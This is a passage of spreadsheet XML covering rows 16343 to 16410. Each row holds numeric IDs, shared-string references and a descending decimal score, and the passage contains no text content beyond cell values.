      </c>
      <c r="D16343" s="2">
        <v>1.0</v>
      </c>
      <c r="E16343" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16343" s="2">
        <v>0.2672839506172839</v>
      </c>
    </row>
    <row r="16344" ht="15.75" customHeight="1">
      <c r="A16344" s="1">
        <v>19108.0</v>
      </c>
      <c r="B16344" s="2">
        <v>5.4734661E7</v>
      </c>
      <c r="C16344" s="2" t="s">
        <v>15773</v>
      </c>
      <c r="D16344" s="2">
        <v>1.0</v>
      </c>
      <c r="E16344" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16344" s="2">
        <v>0.2648953301127214</v>
      </c>
    </row>
    <row r="16345" ht="15.75" customHeight="1">
      <c r="A16345" s="1">
        <v>31144.0</v>
      </c>
      <c r="B16345" s="2">
        <v>4889824.0</v>
      </c>
      <c r="C16345" s="2" t="s">
        <v>15774</v>
      </c>
      <c r="D16345" s="2">
        <v>1.0</v>
      </c>
      <c r="E16345" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16345" s="2">
        <v>0.2630285152409046</v>
      </c>
    </row>
    <row r="16346" ht="15.75" customHeight="1">
      <c r="A16346" s="1">
        <v>26230.0</v>
      </c>
      <c r="B16346" s="2">
        <v>1.6280297E7</v>
      </c>
      <c r="C16346" s="2" t="s">
        <v>15775</v>
      </c>
      <c r="D16346" s="2">
        <v>1.0</v>
      </c>
      <c r="E16346" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16346" s="2">
        <v>0.2566137566137567</v>
      </c>
    </row>
    <row r="16347" ht="15.75" customHeight="1">
      <c r="A16347" s="1">
        <v>27472.0</v>
      </c>
      <c r="B16347" s="2">
        <v>2.1989045E7</v>
      </c>
      <c r="C16347" s="2" t="s">
        <v>15776</v>
      </c>
      <c r="D16347" s="2">
        <v>1.0</v>
      </c>
      <c r="E16347" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16347" s="2">
        <v>0.2566137566137567</v>
      </c>
    </row>
    <row r="16348" ht="15.75" customHeight="1">
      <c r="A16348" s="1">
        <v>19186.0</v>
      </c>
      <c r="B16348" s="2">
        <v>5.4973931E7</v>
      </c>
      <c r="C16348" s="2" t="s">
        <v>15777</v>
      </c>
      <c r="D16348" s="2">
        <v>1.0</v>
      </c>
      <c r="E16348" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16348" s="2">
        <v>0.2562724014336917</v>
      </c>
    </row>
    <row r="16349" ht="15.75" customHeight="1">
      <c r="A16349" s="1">
        <v>5044.0</v>
      </c>
      <c r="B16349" s="2">
        <v>4.4312599E7</v>
      </c>
      <c r="C16349" s="2" t="s">
        <v>15778</v>
      </c>
      <c r="D16349" s="2">
        <v>1.0</v>
      </c>
      <c r="E16349" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16349" s="2">
        <v>0.2465667915106118</v>
      </c>
    </row>
    <row r="16350" ht="15.75" customHeight="1">
      <c r="A16350" s="1">
        <v>31586.0</v>
      </c>
      <c r="B16350" s="2">
        <v>5128684.0</v>
      </c>
      <c r="C16350" s="2" t="s">
        <v>15779</v>
      </c>
      <c r="D16350" s="2">
        <v>1.0</v>
      </c>
      <c r="E16350" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16350" s="2">
        <v>0.2452991452991453</v>
      </c>
    </row>
    <row r="16351" ht="15.75" customHeight="1">
      <c r="A16351" s="1">
        <v>14461.0</v>
      </c>
      <c r="B16351" s="2">
        <v>3.9459757E7</v>
      </c>
      <c r="C16351" s="2" t="s">
        <v>15780</v>
      </c>
      <c r="D16351" s="2">
        <v>1.0</v>
      </c>
      <c r="E16351" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16351" s="2">
        <v>0.2409090909090908</v>
      </c>
    </row>
    <row r="16352" ht="15.75" customHeight="1">
      <c r="A16352" s="1">
        <v>27474.0</v>
      </c>
      <c r="B16352" s="2">
        <v>2.1989045E7</v>
      </c>
      <c r="C16352" s="2" t="s">
        <v>15781</v>
      </c>
      <c r="D16352" s="2">
        <v>1.0</v>
      </c>
      <c r="E16352" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16352" s="2">
        <v>0.236318407960199</v>
      </c>
    </row>
    <row r="16353" ht="15.75" customHeight="1">
      <c r="A16353" s="1">
        <v>10607.0</v>
      </c>
      <c r="B16353" s="2">
        <v>1.3672052E7</v>
      </c>
      <c r="C16353" s="2" t="s">
        <v>15782</v>
      </c>
      <c r="D16353" s="2">
        <v>1.0</v>
      </c>
      <c r="E16353" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16353" s="2">
        <v>0.2350427350427351</v>
      </c>
    </row>
    <row r="16354" ht="15.75" customHeight="1">
      <c r="A16354" s="1">
        <v>26208.0</v>
      </c>
      <c r="B16354" s="2">
        <v>1.6241872E7</v>
      </c>
      <c r="C16354" s="2" t="s">
        <v>15783</v>
      </c>
      <c r="D16354" s="2">
        <v>1.0</v>
      </c>
      <c r="E16354" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16354" s="2">
        <v>0.2323943661971831</v>
      </c>
    </row>
    <row r="16355" ht="15.75" customHeight="1">
      <c r="A16355" s="1">
        <v>27475.0</v>
      </c>
      <c r="B16355" s="2">
        <v>2.1989045E7</v>
      </c>
      <c r="C16355" s="2" t="s">
        <v>15784</v>
      </c>
      <c r="D16355" s="2">
        <v>1.0</v>
      </c>
      <c r="E16355" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16355" s="2">
        <v>0.23224043715847</v>
      </c>
    </row>
    <row r="16356" ht="15.75" customHeight="1">
      <c r="A16356" s="1">
        <v>13435.0</v>
      </c>
      <c r="B16356" s="2">
        <v>3.510925E7</v>
      </c>
      <c r="C16356" s="2" t="s">
        <v>15785</v>
      </c>
      <c r="D16356" s="2">
        <v>1.0</v>
      </c>
      <c r="E16356" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16356" s="2">
        <v>0.2309523809523809</v>
      </c>
    </row>
    <row r="16357" ht="15.75" customHeight="1">
      <c r="A16357" s="1">
        <v>27473.0</v>
      </c>
      <c r="B16357" s="2">
        <v>2.1989045E7</v>
      </c>
      <c r="C16357" s="2" t="s">
        <v>15786</v>
      </c>
      <c r="D16357" s="2">
        <v>1.0</v>
      </c>
      <c r="E16357" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16357" s="2">
        <v>0.2305555555555555</v>
      </c>
    </row>
    <row r="16358" ht="15.75" customHeight="1">
      <c r="A16358" s="1">
        <v>30291.0</v>
      </c>
      <c r="B16358" s="2">
        <v>3.7733046E7</v>
      </c>
      <c r="C16358" s="2" t="s">
        <v>15787</v>
      </c>
      <c r="D16358" s="2">
        <v>1.0</v>
      </c>
      <c r="E16358" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16358" s="2">
        <v>0.2300347222222223</v>
      </c>
    </row>
    <row r="16359" ht="15.75" customHeight="1">
      <c r="A16359" s="1">
        <v>20899.0</v>
      </c>
      <c r="B16359" s="2">
        <v>1.6241873E7</v>
      </c>
      <c r="C16359" s="2" t="s">
        <v>15783</v>
      </c>
      <c r="D16359" s="2">
        <v>1.0</v>
      </c>
      <c r="E16359" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16359" s="2">
        <v>0.229264475743349</v>
      </c>
    </row>
    <row r="16360" ht="15.75" customHeight="1">
      <c r="A16360" s="1">
        <v>32631.0</v>
      </c>
      <c r="B16360" s="2">
        <v>5852447.0</v>
      </c>
      <c r="C16360" s="2" t="s">
        <v>15788</v>
      </c>
      <c r="D16360" s="2">
        <v>1.0</v>
      </c>
      <c r="E16360" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16360" s="2">
        <v>0.2230392156862746</v>
      </c>
    </row>
    <row r="16361" ht="15.75" customHeight="1">
      <c r="A16361" s="1">
        <v>15062.0</v>
      </c>
      <c r="B16361" s="2">
        <v>4.1702355E7</v>
      </c>
      <c r="C16361" s="2" t="s">
        <v>15789</v>
      </c>
      <c r="D16361" s="2">
        <v>1.0</v>
      </c>
      <c r="E16361" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16361" s="2">
        <v>0.2213541666666667</v>
      </c>
    </row>
    <row r="16362" ht="15.75" customHeight="1">
      <c r="A16362" s="1">
        <v>33601.0</v>
      </c>
      <c r="B16362" s="2">
        <v>8340077.0</v>
      </c>
      <c r="C16362" s="2" t="s">
        <v>15790</v>
      </c>
      <c r="D16362" s="2">
        <v>1.0</v>
      </c>
      <c r="E16362" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16362" s="2">
        <v>0.2213541666666667</v>
      </c>
    </row>
    <row r="16363" ht="15.75" customHeight="1">
      <c r="A16363" s="1">
        <v>23940.0</v>
      </c>
      <c r="B16363" s="2">
        <v>8797574.0</v>
      </c>
      <c r="C16363" s="2" t="s">
        <v>15791</v>
      </c>
      <c r="D16363" s="2">
        <v>1.0</v>
      </c>
      <c r="E16363" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16363" s="2">
        <v>0.2212962962962962</v>
      </c>
    </row>
    <row r="16364" ht="15.75" customHeight="1">
      <c r="A16364" s="1">
        <v>25490.0</v>
      </c>
      <c r="B16364" s="2">
        <v>1.4037372E7</v>
      </c>
      <c r="C16364" s="2" t="s">
        <v>15792</v>
      </c>
      <c r="D16364" s="2">
        <v>1.0</v>
      </c>
      <c r="E16364" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16364" s="2">
        <v>0.2184170471841705</v>
      </c>
    </row>
    <row r="16365" ht="15.75" customHeight="1">
      <c r="A16365" s="1">
        <v>30057.0</v>
      </c>
      <c r="B16365" s="2">
        <v>3625090.0</v>
      </c>
      <c r="C16365" s="2" t="s">
        <v>15793</v>
      </c>
      <c r="D16365" s="2">
        <v>1.0</v>
      </c>
      <c r="E16365" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16365" s="2">
        <v>0.2162393162393162</v>
      </c>
    </row>
    <row r="16366" ht="15.75" customHeight="1">
      <c r="A16366" s="1">
        <v>20027.0</v>
      </c>
      <c r="B16366" s="2">
        <v>6580088.0</v>
      </c>
      <c r="C16366" s="2" t="s">
        <v>15794</v>
      </c>
      <c r="D16366" s="2">
        <v>1.0</v>
      </c>
      <c r="E16366" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16366" s="2">
        <v>0.21619812583668</v>
      </c>
    </row>
    <row r="16367" ht="15.75" customHeight="1">
      <c r="A16367" s="1">
        <v>21245.0</v>
      </c>
      <c r="B16367" s="2">
        <v>1.9832772E7</v>
      </c>
      <c r="C16367" s="2" t="s">
        <v>15795</v>
      </c>
      <c r="D16367" s="2">
        <v>1.0</v>
      </c>
      <c r="E16367" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16367" s="2">
        <v>0.2160493827160495</v>
      </c>
    </row>
    <row r="16368" ht="15.75" customHeight="1">
      <c r="A16368" s="1">
        <v>33450.0</v>
      </c>
      <c r="B16368" s="2">
        <v>7883603.0</v>
      </c>
      <c r="C16368" s="2" t="s">
        <v>15796</v>
      </c>
      <c r="D16368" s="2">
        <v>1.0</v>
      </c>
      <c r="E16368" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16368" s="2">
        <v>0.2160493827160495</v>
      </c>
    </row>
    <row r="16369" ht="15.75" customHeight="1">
      <c r="A16369" s="1">
        <v>33452.0</v>
      </c>
      <c r="B16369" s="2">
        <v>7883638.0</v>
      </c>
      <c r="C16369" s="2" t="s">
        <v>15796</v>
      </c>
      <c r="D16369" s="2">
        <v>1.0</v>
      </c>
      <c r="E16369" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16369" s="2">
        <v>0.2160493827160495</v>
      </c>
    </row>
    <row r="16370" ht="15.75" customHeight="1">
      <c r="A16370" s="1">
        <v>23148.0</v>
      </c>
      <c r="B16370" s="2">
        <v>5175679.0</v>
      </c>
      <c r="C16370" s="2" t="s">
        <v>15797</v>
      </c>
      <c r="D16370" s="2">
        <v>1.0</v>
      </c>
      <c r="E16370" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16370" s="2">
        <v>0.2158469945355191</v>
      </c>
    </row>
    <row r="16371" ht="15.75" customHeight="1">
      <c r="A16371" s="1">
        <v>22655.0</v>
      </c>
      <c r="B16371" s="2">
        <v>4.1140498E7</v>
      </c>
      <c r="C16371" s="2" t="s">
        <v>15798</v>
      </c>
      <c r="D16371" s="2">
        <v>1.0</v>
      </c>
      <c r="E16371" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16371" s="2">
        <v>0.2146464646464646</v>
      </c>
    </row>
    <row r="16372" ht="15.75" customHeight="1">
      <c r="A16372" s="1">
        <v>530.0</v>
      </c>
      <c r="B16372" s="2">
        <v>1.850251E7</v>
      </c>
      <c r="C16372" s="2" t="s">
        <v>15799</v>
      </c>
      <c r="D16372" s="2">
        <v>1.0</v>
      </c>
      <c r="E16372" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16372" s="2">
        <v>0.2145833333333333</v>
      </c>
    </row>
    <row r="16373" ht="15.75" customHeight="1">
      <c r="A16373" s="1">
        <v>33820.0</v>
      </c>
      <c r="B16373" s="2">
        <v>8907526.0</v>
      </c>
      <c r="C16373" s="2" t="s">
        <v>15800</v>
      </c>
      <c r="D16373" s="2">
        <v>1.0</v>
      </c>
      <c r="E16373" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16373" s="2">
        <v>0.2126736111111112</v>
      </c>
    </row>
    <row r="16374" ht="15.75" customHeight="1">
      <c r="A16374" s="1">
        <v>26487.0</v>
      </c>
      <c r="B16374" s="2">
        <v>1.750529E7</v>
      </c>
      <c r="C16374" s="2" t="s">
        <v>15801</v>
      </c>
      <c r="D16374" s="2">
        <v>1.0</v>
      </c>
      <c r="E16374" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16374" s="2">
        <v>0.2125220458553793</v>
      </c>
    </row>
    <row r="16375" ht="15.75" customHeight="1">
      <c r="A16375" s="1">
        <v>33173.0</v>
      </c>
      <c r="B16375" s="2">
        <v>7086250.0</v>
      </c>
      <c r="C16375" s="2" t="s">
        <v>15802</v>
      </c>
      <c r="D16375" s="2">
        <v>1.0</v>
      </c>
      <c r="E16375" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16375" s="2">
        <v>0.2121913580246914</v>
      </c>
    </row>
    <row r="16376" ht="15.75" customHeight="1">
      <c r="A16376" s="1">
        <v>23991.0</v>
      </c>
      <c r="B16376" s="2">
        <v>9196815.0</v>
      </c>
      <c r="C16376" s="2" t="s">
        <v>15803</v>
      </c>
      <c r="D16376" s="2">
        <v>1.0</v>
      </c>
      <c r="E16376" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16376" s="2">
        <v>0.2101851851851852</v>
      </c>
    </row>
    <row r="16377" ht="15.75" customHeight="1">
      <c r="A16377" s="1">
        <v>8419.0</v>
      </c>
      <c r="B16377" s="2">
        <v>5.3919253E7</v>
      </c>
      <c r="C16377" s="2" t="s">
        <v>15804</v>
      </c>
      <c r="D16377" s="2">
        <v>1.0</v>
      </c>
      <c r="E16377" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16377" s="2">
        <v>0.209967320261438</v>
      </c>
    </row>
    <row r="16378" ht="15.75" customHeight="1">
      <c r="A16378" s="1">
        <v>8025.0</v>
      </c>
      <c r="B16378" s="2">
        <v>5.2806109E7</v>
      </c>
      <c r="C16378" s="2" t="s">
        <v>15805</v>
      </c>
      <c r="D16378" s="2">
        <v>1.0</v>
      </c>
      <c r="E16378" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16378" s="2">
        <v>0.2097701149425287</v>
      </c>
    </row>
    <row r="16379" ht="15.75" customHeight="1">
      <c r="A16379" s="1">
        <v>32505.0</v>
      </c>
      <c r="B16379" s="2">
        <v>5713783.0</v>
      </c>
      <c r="C16379" s="2" t="s">
        <v>15806</v>
      </c>
      <c r="D16379" s="2">
        <v>1.0</v>
      </c>
      <c r="E16379" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16379" s="2">
        <v>0.2094017094017094</v>
      </c>
    </row>
    <row r="16380" ht="15.75" customHeight="1">
      <c r="A16380" s="1">
        <v>13803.0</v>
      </c>
      <c r="B16380" s="2">
        <v>3.6652774E7</v>
      </c>
      <c r="C16380" s="2" t="s">
        <v>15807</v>
      </c>
      <c r="D16380" s="2">
        <v>1.0</v>
      </c>
      <c r="E16380" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16380" s="2">
        <v>0.2089947089947091</v>
      </c>
    </row>
    <row r="16381" ht="15.75" customHeight="1">
      <c r="A16381" s="1">
        <v>32209.0</v>
      </c>
      <c r="B16381" s="2">
        <v>5.4840879E7</v>
      </c>
      <c r="C16381" s="2" t="s">
        <v>15808</v>
      </c>
      <c r="D16381" s="2">
        <v>1.0</v>
      </c>
      <c r="E16381" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16381" s="2">
        <v>0.2089947089947091</v>
      </c>
    </row>
    <row r="16382" ht="15.75" customHeight="1">
      <c r="A16382" s="1">
        <v>769.0</v>
      </c>
      <c r="B16382" s="2">
        <v>2.1066552E7</v>
      </c>
      <c r="C16382" s="2" t="s">
        <v>15809</v>
      </c>
      <c r="D16382" s="2">
        <v>1.0</v>
      </c>
      <c r="E16382" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16382" s="2">
        <v>0.2085346215780998</v>
      </c>
    </row>
    <row r="16383" ht="15.75" customHeight="1">
      <c r="A16383" s="1">
        <v>18389.0</v>
      </c>
      <c r="B16383" s="2">
        <v>5.2602398E7</v>
      </c>
      <c r="C16383" s="2" t="s">
        <v>15810</v>
      </c>
      <c r="D16383" s="2">
        <v>1.0</v>
      </c>
      <c r="E16383" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16383" s="2">
        <v>0.2078544061302682</v>
      </c>
    </row>
    <row r="16384" ht="15.75" customHeight="1">
      <c r="A16384" s="1">
        <v>10979.0</v>
      </c>
      <c r="B16384" s="2">
        <v>1.7364732E7</v>
      </c>
      <c r="C16384" s="2" t="s">
        <v>15811</v>
      </c>
      <c r="D16384" s="2">
        <v>1.0</v>
      </c>
      <c r="E16384" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16384" s="2">
        <v>0.206989247311828</v>
      </c>
    </row>
    <row r="16385" ht="15.75" customHeight="1">
      <c r="A16385" s="1">
        <v>33702.0</v>
      </c>
      <c r="B16385" s="2">
        <v>8472698.0</v>
      </c>
      <c r="C16385" s="2" t="s">
        <v>15812</v>
      </c>
      <c r="D16385" s="2">
        <v>1.0</v>
      </c>
      <c r="E16385" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16385" s="2">
        <v>0.205982905982906</v>
      </c>
    </row>
    <row r="16386" ht="15.75" customHeight="1">
      <c r="A16386" s="1">
        <v>15733.0</v>
      </c>
      <c r="B16386" s="2">
        <v>4.4064196E7</v>
      </c>
      <c r="C16386" s="2" t="s">
        <v>15813</v>
      </c>
      <c r="D16386" s="2">
        <v>1.0</v>
      </c>
      <c r="E16386" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16386" s="2">
        <v>0.2057291666666667</v>
      </c>
    </row>
    <row r="16387" ht="15.75" customHeight="1">
      <c r="A16387" s="1">
        <v>14664.0</v>
      </c>
      <c r="B16387" s="2">
        <v>4.0451154E7</v>
      </c>
      <c r="C16387" s="2" t="s">
        <v>15814</v>
      </c>
      <c r="D16387" s="2">
        <v>1.0</v>
      </c>
      <c r="E16387" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16387" s="2">
        <v>0.2054673721340389</v>
      </c>
    </row>
    <row r="16388" ht="15.75" customHeight="1">
      <c r="A16388" s="1">
        <v>15907.0</v>
      </c>
      <c r="B16388" s="2">
        <v>4.4628828E7</v>
      </c>
      <c r="C16388" s="2" t="s">
        <v>15815</v>
      </c>
      <c r="D16388" s="2">
        <v>1.0</v>
      </c>
      <c r="E16388" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16388" s="2">
        <v>0.204331450094162</v>
      </c>
    </row>
    <row r="16389" ht="15.75" customHeight="1">
      <c r="A16389" s="1">
        <v>33895.0</v>
      </c>
      <c r="B16389" s="2">
        <v>9196814.0</v>
      </c>
      <c r="C16389" s="2" t="s">
        <v>15816</v>
      </c>
      <c r="D16389" s="2">
        <v>1.0</v>
      </c>
      <c r="E16389" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16389" s="2">
        <v>0.204331450094162</v>
      </c>
    </row>
    <row r="16390" ht="15.75" customHeight="1">
      <c r="A16390" s="1">
        <v>18557.0</v>
      </c>
      <c r="B16390" s="2">
        <v>5.3168335E7</v>
      </c>
      <c r="C16390" s="2" t="s">
        <v>15817</v>
      </c>
      <c r="D16390" s="2">
        <v>1.0</v>
      </c>
      <c r="E16390" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16390" s="2">
        <v>0.2034534534534535</v>
      </c>
    </row>
    <row r="16391" ht="15.75" customHeight="1">
      <c r="A16391" s="1">
        <v>26703.0</v>
      </c>
      <c r="B16391" s="2">
        <v>1.8185033E7</v>
      </c>
      <c r="C16391" s="2" t="s">
        <v>15818</v>
      </c>
      <c r="D16391" s="2">
        <v>1.0</v>
      </c>
      <c r="E16391" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16391" s="2">
        <v>0.2025641025641026</v>
      </c>
    </row>
    <row r="16392" ht="15.75" customHeight="1">
      <c r="A16392" s="1">
        <v>20264.0</v>
      </c>
      <c r="B16392" s="2">
        <v>1.1068641E7</v>
      </c>
      <c r="C16392" s="2" t="s">
        <v>15819</v>
      </c>
      <c r="D16392" s="2">
        <v>1.0</v>
      </c>
      <c r="E16392" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16392" s="2">
        <v>0.2021072796934866</v>
      </c>
    </row>
    <row r="16393" ht="15.75" customHeight="1">
      <c r="A16393" s="1">
        <v>25705.0</v>
      </c>
      <c r="B16393" s="2">
        <v>1.4530134E7</v>
      </c>
      <c r="C16393" s="2" t="s">
        <v>15820</v>
      </c>
      <c r="D16393" s="2">
        <v>1.0</v>
      </c>
      <c r="E16393" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16393" s="2">
        <v>0.2012750455373406</v>
      </c>
    </row>
    <row r="16394" ht="15.75" customHeight="1">
      <c r="A16394" s="1">
        <v>31431.0</v>
      </c>
      <c r="B16394" s="2">
        <v>5.0134747E7</v>
      </c>
      <c r="C16394" s="2" t="s">
        <v>15821</v>
      </c>
      <c r="D16394" s="2">
        <v>1.0</v>
      </c>
      <c r="E16394" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16394" s="2">
        <v>0.2005050505050505</v>
      </c>
    </row>
    <row r="16395" ht="15.75" customHeight="1">
      <c r="A16395" s="1">
        <v>12139.0</v>
      </c>
      <c r="B16395" s="2">
        <v>2.7085923E7</v>
      </c>
      <c r="C16395" s="2" t="s">
        <v>15822</v>
      </c>
      <c r="D16395" s="2">
        <v>1.0</v>
      </c>
      <c r="E16395" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16395" s="2">
        <v>0.2001763668430336</v>
      </c>
    </row>
    <row r="16396" ht="15.75" customHeight="1">
      <c r="A16396" s="1">
        <v>25409.0</v>
      </c>
      <c r="B16396" s="2">
        <v>1.3777993E7</v>
      </c>
      <c r="C16396" s="2" t="s">
        <v>15823</v>
      </c>
      <c r="D16396" s="2">
        <v>1.0</v>
      </c>
      <c r="E16396" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16396" s="2">
        <v>0.1994949494949495</v>
      </c>
    </row>
    <row r="16397" ht="15.75" customHeight="1">
      <c r="A16397" s="1">
        <v>21024.0</v>
      </c>
      <c r="B16397" s="2">
        <v>1.7441856E7</v>
      </c>
      <c r="C16397" s="2" t="s">
        <v>15824</v>
      </c>
      <c r="D16397" s="2">
        <v>1.0</v>
      </c>
      <c r="E16397" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16397" s="2">
        <v>0.1994535519125683</v>
      </c>
    </row>
    <row r="16398" ht="15.75" customHeight="1">
      <c r="A16398" s="1">
        <v>26164.0</v>
      </c>
      <c r="B16398" s="2">
        <v>1.6097611E7</v>
      </c>
      <c r="C16398" s="2" t="s">
        <v>15825</v>
      </c>
      <c r="D16398" s="2">
        <v>1.0</v>
      </c>
      <c r="E16398" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16398" s="2">
        <v>0.1987847222222222</v>
      </c>
    </row>
    <row r="16399" ht="15.75" customHeight="1">
      <c r="A16399" s="1">
        <v>33821.0</v>
      </c>
      <c r="B16399" s="2">
        <v>8907526.0</v>
      </c>
      <c r="C16399" s="2" t="s">
        <v>15826</v>
      </c>
      <c r="D16399" s="2">
        <v>1.0</v>
      </c>
      <c r="E16399" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16399" s="2">
        <v>0.1986817325800377</v>
      </c>
    </row>
    <row r="16400" ht="15.75" customHeight="1">
      <c r="A16400" s="1">
        <v>10467.0</v>
      </c>
      <c r="B16400" s="2">
        <v>1.0871077E7</v>
      </c>
      <c r="C16400" s="2" t="s">
        <v>15827</v>
      </c>
      <c r="D16400" s="2">
        <v>1.0</v>
      </c>
      <c r="E16400" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16400" s="2">
        <v>0.1983024691358025</v>
      </c>
    </row>
    <row r="16401" ht="15.75" customHeight="1">
      <c r="A16401" s="1">
        <v>27361.0</v>
      </c>
      <c r="B16401" s="2">
        <v>2.1658132E7</v>
      </c>
      <c r="C16401" s="2" t="s">
        <v>15828</v>
      </c>
      <c r="D16401" s="2">
        <v>1.0</v>
      </c>
      <c r="E16401" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16401" s="2">
        <v>0.1981757877280266</v>
      </c>
    </row>
    <row r="16402" ht="15.75" customHeight="1">
      <c r="A16402" s="1">
        <v>24490.0</v>
      </c>
      <c r="B16402" s="2">
        <v>1.106864E7</v>
      </c>
      <c r="C16402" s="2" t="s">
        <v>15829</v>
      </c>
      <c r="D16402" s="2">
        <v>1.0</v>
      </c>
      <c r="E16402" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16402" s="2">
        <v>0.1972222222222222</v>
      </c>
    </row>
    <row r="16403" ht="15.75" customHeight="1">
      <c r="A16403" s="1">
        <v>17841.0</v>
      </c>
      <c r="B16403" s="2">
        <v>5.0948307E7</v>
      </c>
      <c r="C16403" s="2" t="s">
        <v>15830</v>
      </c>
      <c r="D16403" s="2">
        <v>1.0</v>
      </c>
      <c r="E16403" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16403" s="2">
        <v>0.196236559139785</v>
      </c>
    </row>
    <row r="16404" ht="15.75" customHeight="1">
      <c r="A16404" s="1">
        <v>18830.0</v>
      </c>
      <c r="B16404" s="2">
        <v>5.3940684E7</v>
      </c>
      <c r="C16404" s="2" t="s">
        <v>15831</v>
      </c>
      <c r="D16404" s="2">
        <v>1.0</v>
      </c>
      <c r="E16404" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16404" s="2">
        <v>0.196236559139785</v>
      </c>
    </row>
    <row r="16405" ht="15.75" customHeight="1">
      <c r="A16405" s="1">
        <v>28906.0</v>
      </c>
      <c r="B16405" s="2">
        <v>2.9416224E7</v>
      </c>
      <c r="C16405" s="2" t="s">
        <v>15832</v>
      </c>
      <c r="D16405" s="2">
        <v>1.0</v>
      </c>
      <c r="E16405" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16405" s="2">
        <v>0.196236559139785</v>
      </c>
    </row>
    <row r="16406" ht="15.75" customHeight="1">
      <c r="A16406" s="1">
        <v>17670.0</v>
      </c>
      <c r="B16406" s="2">
        <v>5.0489724E7</v>
      </c>
      <c r="C16406" s="2" t="s">
        <v>15833</v>
      </c>
      <c r="D16406" s="2">
        <v>1.0</v>
      </c>
      <c r="E16406" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16406" s="2">
        <v>0.1959459459459459</v>
      </c>
    </row>
    <row r="16407" ht="15.75" customHeight="1">
      <c r="A16407" s="1">
        <v>32752.0</v>
      </c>
      <c r="B16407" s="2">
        <v>6053757.0</v>
      </c>
      <c r="C16407" s="2" t="s">
        <v>15834</v>
      </c>
      <c r="D16407" s="2">
        <v>1.0</v>
      </c>
      <c r="E16407" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16407" s="2">
        <v>0.1957264957264958</v>
      </c>
    </row>
    <row r="16408" ht="15.75" customHeight="1">
      <c r="A16408" s="1">
        <v>2126.0</v>
      </c>
      <c r="B16408" s="2">
        <v>3.1405015E7</v>
      </c>
      <c r="C16408" s="2" t="s">
        <v>15835</v>
      </c>
      <c r="D16408" s="2">
        <v>1.0</v>
      </c>
      <c r="E16408" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16408" s="2">
        <v>0.192942942942943</v>
      </c>
    </row>
    <row r="16409" ht="15.75" customHeight="1">
      <c r="A16409" s="1">
        <v>33317.0</v>
      </c>
      <c r="B16409" s="2">
        <v>7524704.0</v>
      </c>
      <c r="C16409" s="2" t="s">
        <v>15836</v>
      </c>
      <c r="D16409" s="2">
        <v>1.0</v>
      </c>
      <c r="E16409" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16409" s="2">
        <v>0.1928571428571429</v>
      </c>
    </row>
    <row r="16410" ht="15.75" customHeight="1">
      <c r="A16410" s="1">
        <v>29041.0</v>
      </c>
      <c r="B16410" s="2">
        <v>3.0159551E7</v>
      </c>
      <c r="C16410" s="2" t="s">
        <v>15837</v>
      </c>
      <c r="D16410" s="2">
        <v>1.0</v>
      </c>
